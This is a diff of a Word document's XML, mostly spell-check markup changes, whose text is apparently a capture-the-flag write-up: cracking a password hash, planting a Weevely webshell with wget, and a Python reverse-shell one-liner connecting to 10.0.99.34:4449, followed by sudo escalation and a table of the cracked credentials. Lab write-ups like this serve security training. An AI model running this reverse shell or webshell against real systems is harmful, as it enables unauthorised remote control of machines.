         <w:r>
           <w:rPr>
@@ -3174,11 +3697,19 @@
         <w:t xml:space="preserve"> | </w:t>
       </w:r>
       <w:hyperlink r:id="rId14" w:history="1">
+        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">exploitDB </w:t>
+          <w:t>exploitDB</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -3191,11 +3722,19 @@
         <w:t xml:space="preserve"> | </w:t>
       </w:r>
       <w:hyperlink r:id="rId15" w:history="1">
+        <w:proofErr w:type="spellStart"/>
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t xml:space="preserve">exploitDB </w:t>
+          <w:t>exploitDB</w:t>
+        </w:r>
+        <w:proofErr w:type="spellEnd"/>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> </w:t>
         </w:r>
         <w:r>
           <w:rPr>
@@ -3326,11 +3865,19 @@
       <w:r>
         <w:fldChar w:fldCharType="separate"/>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Hyperlink"/>
         </w:rPr>
-        <w:t xml:space="preserve">exploitDB </w:t>
+        <w:t>exploitDB</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Hyperlink"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3589,7 +4136,15 @@
     <w:p>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Taking this hash, cracked it and found it equals the password “gandalfthewhite”:</w:t>
+        <w:t>Taking this hash, cracked it and found it equals the password “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gandalfthewhite</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>”:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3658,11 +4213,32 @@
         <w:t>Then, using</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Weevely, created a webshell named “fotp</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Weevely</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, created a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>webshell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> named “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>fotp</w:t>
       </w:r>
       <w:r>
         <w:t>.php</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>”:</w:t>
       </w:r>
@@ -3783,11 +4359,21 @@
         <w:t xml:space="preserve">moved </w:t>
       </w:r>
       <w:r>
-        <w:t>the webshell</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> onto the target with wget</w:t>
-      </w:r>
+        <w:t xml:space="preserve">the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>webshell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> onto the target with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>wget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>:</w:t>
       </w:r>
@@ -3848,13 +4434,26 @@
         <w:t>d</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> Weevely to </w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Weevely</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">connect to </w:t>
       </w:r>
-      <w:r>
-        <w:t>webshell:</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>webshell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3962,55 +4561,195 @@
         <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">through Weevely, </w:t>
+        <w:t xml:space="preserve">through </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Weevely</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:t>starting</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> a reverse shell (screenshot showing process down successfully):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">python3 -c "import sys, socket, os, pty;s=socket.socket(socket.AF_INET, </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
-        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
-          <w:color w:val="D4D4D4"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>socket.SOCK_STREAM);s.connect(('10.0.99.34',4449));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash');"</w:t>
+        <w:t xml:space="preserve"> a reverse shell (screenshot </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">below </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">showing process </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">done </w:t>
+      </w:r>
+      <w:r>
+        <w:t>successfully):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">python3 -c "import sys, socket, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>pty;s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>socket.socket</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>socket.AF_INET</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">socket.SOCK_STREAM);s.connect(('10.0.99.34',4449));[os.dup2(s.fileno(),fd) for </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>fd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in (0,1,2)];</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>pty.spawn</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>('/bin/bash');"</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -4062,16 +4801,40 @@
         <w:t xml:space="preserve">After, </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">checked “/home” and found a user named “gandalf”, tried the root password gained from </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">the database and it successfully authenticated. Checked the gandalf </w:t>
+        <w:t>checked “/home” and found a user named “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gandalf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">”, tried the root password gained from </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">the database and it successfully authenticated. Checked the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>gandalf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">users’ </w:t>
       </w:r>
       <w:r>
-        <w:t>groups with “id”, found it has sudo so escalation to root was possible. Screenshot shows process and user/root flags:</w:t>
+        <w:t xml:space="preserve">groups with “id”, found it has </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sudo</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> so escalation to root was possible. Screenshot shows process and user/root flags:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -4096,12 +4859,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>gandalf user username</w:t>
+              <w:t>gandalf</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> user username</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4116,12 +4888,21 @@
                 <w:bCs/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:b/>
                 <w:bCs/>
               </w:rPr>
-              <w:t>gandalf user password</w:t>
+              <w:t>gandalf</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+              </w:rPr>
+              <w:t xml:space="preserve"> user password</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4132,9 +4913,11 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>gandalf</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
         <w:tc>
@@ -4142,9 +4925,11 @@
             <w:tcW w:w="4675" w:type="dxa"/>
           </w:tcPr>
           <w:p>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:t>gandalfthewhite</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
